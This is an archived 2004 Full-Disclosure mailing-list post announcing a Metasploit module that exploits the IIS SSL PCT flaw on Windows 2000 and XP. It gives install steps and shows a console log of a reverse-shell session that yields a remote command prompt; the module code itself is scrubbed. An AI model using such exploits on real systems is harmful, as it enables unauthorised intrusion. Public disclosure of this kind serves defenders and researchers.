lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: fdlist at digitaloffense.net (H D Moore) Subject: Metasploit Microsoft IIS SSL PCT Module Attached is an exploit module for version 2.0 of the Metasploit Framework. This module was based on Johnny Cyberpunk's code and includes some interesting improvements: - Targets for Windows 2000 and Windows XP - SSL request modified to allow exploitation on Windows XP - Use of ExitThread allows repeatable exploitation - Shellcode is limited to 1800 bytes or so... To use this module, copy the attached file into the "exploits" subdirectory of the Metasploit Framework 2.0 installation. Win32 users should copy this file into $BASE\home\framework-2.0\exploits, where $BASE is where you installed the Framework. If for some reason you don't have the Metasploit Framework installed, grab it from the following URL: http://metasploit.com/projects/Framework/ If you specify the wrong offset, LSASS will stop functioning (but not crash!), so make sure you know your targets. This module has been tested against most Windows 2000 and Windows XP versions (English only, sorry). Cheers, HD and spoonm ______________________________________ msf iis5x_ssl_pct(winreverse_stg) > exploit [*] Starting Reverse Handler. [*] Attempting to exploit target Windows XP SP1 [*] Sending 329 bytes to remote host. [*] Waiting for a response... [*] Got connection from 192.168.50.98:1038 [*] Sending Stage (115 bytes) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> -------------- next part -------------- A non-text attachment was scrubbed... Name: iis5x_ssl_pct.pm Type: application/x-perl-module Size: 3111 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040424/b59bf18a/iis5x_ssl_pct.bin
Powered by blists - more mailing lists